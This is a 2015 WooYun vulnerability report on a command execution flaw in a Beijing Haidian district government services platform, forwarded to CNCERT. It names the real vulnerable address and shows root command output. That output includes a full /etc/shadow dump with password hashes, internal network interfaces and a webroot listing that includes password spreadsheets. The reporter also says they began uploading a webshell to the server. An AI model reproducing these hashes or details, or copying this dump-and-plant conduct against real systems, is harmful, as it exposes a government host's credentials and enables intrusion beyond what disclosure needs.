当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122029

漏洞标题:北京海淀区政府的智慧政务综合服务平台命令执行漏洞

相关厂商:北京海淀区政府的智慧政务综合服务平台

漏洞作者: 朱元璋

提交时间:2015-06-25 14:23

修复时间:2015-08-13 18:24

公开时间:2015-08-13 18:24

漏洞类型:命令执行

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

北京海淀区政府的智慧政务综合服务平台命令执行漏洞

详细说明:

地址http://61.49.38.13:8888/noticeDetail.action?itemId=8a2530114843ba4d01497a73262a009c存在命令执行漏洞

0.png


whoami

root


cat /etc/shadow

root:$1$Dd9jGRAX$9J.EFVS1cDRq5OXQtvpTc/:16253:0:99999:7:::
bin:*:16196:0:99999:7:::
daemon:!:16196:0:99999:7:::
adm:!:16196:0:99999:7:::
lp:!:16196:0:99999:7:::
sync:!:16196:0:99999:7:::
shutdown:*:16196:0:99999:7:::
halt:!:16196:0:99999:7:::
mail:!:16196:0:99999:7:::
news:!:16196:0:99999:7:::
uucp:!:16196:0:99999:7:::
operator:*:16196:0:99999:7:::
games:!:16196:0:99999:7:::
gopher:!:16196:0:99999:7:::
ftp:!:16196:0:99999:7:::
nobody:!:16196:0:99999:7:::
distcache:!!:16196:0:99999:7:::
nscd:!!:16196:0:99999:7:::
vcsa:!!:16196:0:99999:7:::
pcap:!!:16196:0:99999:7:::
ntp:!!:16196:0:99999:7:::
dbus:!!:16196:0:99999:7:::
apache:!!:16196:0:99999:7:::
avahi:!!:16196:0:99999:7:::
rpc:!!:16196:0:99999:7:::
named:!!:16196:0:99999:7:::
mailnull:!!:16196:0:99999:7:::
smmsp:!!:16196:0:99999:7:::
hsqldb:!!:16196:0:99999:7:::
sshd:!!:16196:0:99999:7:::
webalizer:!!:16196:0:99999:7:::
dovecot:!!:16196:0:99999:7:::
squid:!!:16196:0:99999:7:::
rpcuser:!!:16196:0:99999:7:::
nfsnobody:!!:16196:0:99999:7:::
xfs:!!:16196:0:99999:7:::
haldaemon:!!:16196:0:99999:7:::
avahi-autoipd:!!:16196:0:99999:7:::
gdm:!!:16196:0:99999:7:::
piranha:!!:16196::::::
mysql:!!:16196::::::
touchcap:$1$YaItdydt$XkksOR2snEkzmCDEMzrnX1:16196:0:99999:7:::
avonaco:$1$.FFDZ1eW$J486jemGhP9tU1Cpk6MwV1:16263:30:90:7:::
clamav:!!:16266::::::
oracle:$1$IPu8W87K$YvEl0SD5bEfucioGlu17x/:16533:30:90:7:::
community:$1$BAm.TAbA$YQZb/hRELSZJw.sZJRRV10:16399:30:90:7:::


ifconfig

eth0      Link encap:Ethernet  HWaddr 00:25:90:5A:3F:18  
          inet addr:10.165.176.73  Bcast:10.165.176.255  Mask:255.255.255.0
          inet6 addr: fe80::225:90ff:fe5a:3f18/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:62421969 errors:0 dropped:0 overruns:0 frame:0
          TX packets:395437 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2696239419 (2.5 GiB)  TX bytes:185949678 (177.3 MiB)
          Memory:fafe0000-fb000000 
eth1      Link encap:Ethernet  HWaddr 00:25:90:5A:3F:19  
          inet addr:192.168.2.6  Bcast:192.168.2.255  Mask:255.255.255.0
          inet6 addr: fe80::225:90ff:fe5a:3f19/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:231941550 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2908183 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2556281533 (2.3 GiB)  TX bytes:41


ls /hdzw_wai/WebRoot/

404.jsp
500.jsp
502.jsp
META-INF
WEB-INF
attachment
checkError.jsp
css
dataplat
do-not-submit-again.jsp
eca
error.jsp
error_go.jsp
iframe_login.jsp
images
index.jsp
itemorg
js
jsp
jw.html
jw.jsp
login.jsp
login1.jsp
mytesttest.jsp
ocx
phoneLink
register.jsp
sqlError.jsp
sso
test.jsp
userDoc.doc
userPass.xls
userPass.xlsx
????????????????????????


开始传马进服务器,呵呵

1.png


漏洞证明:

2.jpg

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-29 18:22

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论